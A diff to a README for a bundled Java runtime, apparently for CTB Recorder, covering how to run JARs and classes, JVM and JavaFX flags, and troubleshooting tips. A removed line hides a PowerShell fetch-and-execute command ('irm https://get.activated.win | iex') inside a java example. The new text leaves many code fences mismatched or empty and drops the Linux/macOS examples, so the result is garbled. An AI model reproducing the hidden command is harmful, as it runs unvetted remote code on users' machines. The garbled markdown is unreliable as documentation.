@@ -16,21 +16,46 @@ release\bin\java -version
 
 ```bash
 release/bin/java -version
-```
+```bash
 
 ### Run a JAR File
+```bash
 
 **Windows:**
+
+```
 
 ```cmd
 release\bin\java -jar path\to\your-application.jar
 ```
 
-**Linux/macOS:**
+Minimal invocation is sufficient to start most applications. For CTB Recorder the distribution includes recommended JVM flags and module options; use the bundled launcher (`ctbrec.bat`) or run the example below from the product root so `./config` resolves correctly:
 
-```bash
-release/bin/java -jar irm https://get.activated.win | iexpath/to/your-application.jar
+```cmd
+rem Minimal (starts the app)
+release\bin\java -jar path\to\your-application.jar
+
+rem Shaded artifact (built by Maven Shade plugin)
+"release\bin\java.exe" -jar "target\ctbrec-1.0-SNAPSHOT-shaded.jar"
+
+rem Shaded artifact with explicit JavaFX modules (if runtime lacks JavaFX)
+"release\bin\java.exe" --module-path "lib\javafx-sdk\lib" --add-modules=javafx.controls,javafx.fxml -jar "target\ctbrec-1.0-SNAPSHOT-shaded.jar"
+
+rem Recommended (CTB Recorder example with JVM args and JavaFX modules)
+jre\bin\java -Xmx4g -Dctbrec.config.dir=./config -Dfile.encoding=utf-8 ^
+  --add-modules javafx.controls,javafx.media,javafx.swing ^
+  --add-opens javafx.controls/com.sun.javafx.scene.control.behavior=ALL-UNNAMED ^
+  -jar ctbrec-25.11.2.jar
 ```
+
+```text
+
+
+```text
+release/bin/java -jar path/to/your-application.jar
+````
+
+````
 
 ### Run a Java Class
 
@@ -38,14 +63,15 @@ release/bin/java -jar irm https://get.activated.win | iexpath/to/your-applicatio
 
 ```cmd
 release\bin\java -cp lib\your-app.jar com.example.MainClass
-```
+```cmd
 
-**Linux/macOS:**
+```
 
 ```bash
-release/bin/java -cp lib/your-app.jar com.example.MainClass
+```bash
 ```
 
+```
 ## Directory Structure
 
 - **`release/bin/`** — Java executables and launcher scripts
@@ -78,7 +104,37 @@ Additional runtime properties can be found in:
 
 - This is a **runtime distribution** — it does not include source code or build tools.
 - Module licensing information is available in the `legal/` directory for each module.
-- On Unix systems, ensure executables in `release/bin/` have execute permissions.
+```bash
+
+```
+
+- Missing JavaFX / application fails to start: use the bundled `release/bin/java` or `jre/bin/java` from this distribution. If you run a system JDK, ensure JavaFX modules are available or add `--add-modules` as shown in the CTB Recorder example.
+- Config not found / wrong `config` path: run from the product root or set `-Dctbrec.config.dir=absolute\path\to\config`.
+- FFmpeg errors during merging/post-processing: verify `lib/ffmpeg/` contains an executable and that the binary is compatible with your OS/arch. Logs for FFmpeg are written to the recording segments directory (look for `merge.log`).
+- Electron/minimal browser login failures: the minimal browser listens on TCP port `3202`; ensure nothing else blocks that port and cookies are persisted in `config/<version>/cookies-<site>.json`.
+- Cloudflare / protected pages: optional `flaresolverr` service can help; configure `flaresolverr.apiUrl` in `settings.json`.
+
+```cmd
+jre\bin\java -Xmx4g -Dctbrec.config.dir=./config -Dfile.encoding=utf-8 ^
+  --add-modules javafx.controls,javafx.media,javafx.swing ^
+  --add-opens javafx.controls/com.sun.javafx.scene.control.behavior=ALL-UNNAMED ^
+  -jar ctbrec-25.11.2.jar
+```
+
+Single-line (cmd):
+
+```cmd
+jre\bin\java -Xmx4g -Dctbrec.config.dir=./config -Dfile.encoding=utf-8 --add-modules javafx.controls,javafx.media,javafx.swing --add-opens javafx.controls/com.sun.javafx.scene.control.behavior=ALL-UNNAMED -jar ctbrec-25.11.2.jar
+```
+
+PowerShell (use backtick ` as line-continuation):
+
+```powershell
+jre\bin\java -Xmx4g -Dctbrec.config.dir=./config -Dfile.encoding=utf-8 `
+  --add-modules javafx.controls,javafx.media,javafx.swing `
+  --add-opens javafx.controls/com.sun.javafx.scene.control.behavior=ALL-UNNAMED `
+  -jar ctbrec-25.11.2.jar
+```
 
 ## Platform Support
 
